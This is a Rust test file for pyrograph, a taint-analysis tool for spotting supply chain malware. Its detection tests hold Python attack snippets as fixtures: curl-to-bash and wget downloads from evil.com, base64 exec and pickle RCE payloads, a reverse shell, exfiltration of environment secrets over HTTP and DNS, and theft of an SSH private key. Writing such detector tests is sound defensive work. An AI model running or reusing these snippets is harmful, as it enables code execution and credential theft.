pyrograph 0.1.0

GPU-accelerated taint analysis for supply chain malware detection
Documentation
#![cfg(feature = "python")]
use pyrograph::analyze;

fn py_detect(code: &str, name: &str) {
    let g = pyrograph::parse::python::parse_python_with_labels(code, &format!("{name}.py"), None).unwrap();
    let f = analyze(&g).unwrap();
    eprintln!("{name}: {} findings", f.len());
    assert!(!f.is_empty(), "{name}: must detect");
}

fn py_clean(code: &str, name: &str) {
    let g = pyrograph::parse::python::parse_python_with_labels(code, &format!("{name}.py"), None).unwrap();
    let f = analyze(&g).unwrap();
    eprintln!("{name}: {} findings", f.len());
    assert!(f.is_empty(), "{name}: must NOT detect");
}

#[test]
fn python_os_system_curl() {
    py_detect("import os\nos.system('curl https://evil.com/payload | bash')", "os_system_curl");
}

#[test]
fn python_subprocess_wget() {
    py_detect("import subprocess\nsubprocess.run(['wget', 'https://evil.com/malware', '-O', '/tmp/mal'])", "subprocess_wget");
}

#[test]
fn python_exec_base64() {
    py_detect("import base64\nexec(base64.b64decode('cHJpbnQoJ3B3bmVkJyk=').decode())", "exec_base64");
}

#[test]
fn python_socket_reverse_shell() {
    py_detect("import socket,subprocess\ns=socket.socket()\ns.connect(('evil.com',4444))\nsubprocess.call(['/bin/sh','-i'],stdin=s.fileno(),stdout=s.fileno())", "socket_reverse");
}

#[test]
fn python_requests_post_env() {
    py_detect("import os,requests\ntoken=os.environ.get('SECRET')\nrequests.post('https://evil.com',data=token)", "requests_env_exfil");
}

#[test]
fn python_pickle_rce() {
    py_detect("import pickle,base64\npickle.loads(base64.b64decode('gASVMAAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIwOaW1wb3J0IG9zO29zLnN5c3RlbSgnaWQnKZSFlFKULg=='))", "pickle_rce");
}

#[test]
fn python_env_dump_dns() {
    py_detect("import os,socket\nfor k,v in os.environ.items():\n    socket.getaddrinfo(f'{k}.{v}.evil.com',80)", "env_dns_exfil");
}

#[test]
fn python_file_theft() {
    py_detect("import requests\nwith open('/home/user/.ssh/id_rsa') as f:\n    requests.post('https://evil.com',data=f.read())", "ssh_key_theft");
}

// FALSE POSITIVES

#[test]
fn python_flask_route_clean() {
    py_clean("from flask import Flask\napp=Flask(__name__)\n@app.route('/')\ndef index():\n    return 'hello'", "flask_route");
}

#[test]
fn python_pytest_clean() {
    py_clean("import pytest\ndef test_addition():\n    assert 1+1==2", "pytest");
}

#[test]
fn python_logging_clean() {
    py_clean("import logging\nlogger=logging.getLogger(__name__)\nlogger.info('starting server')", "logging");
}

#[test]
fn python_pandas_clean() {
    py_clean("import pandas as pd\ndf=pd.read_csv('data.csv')\nprint(df.describe())", "pandas");
}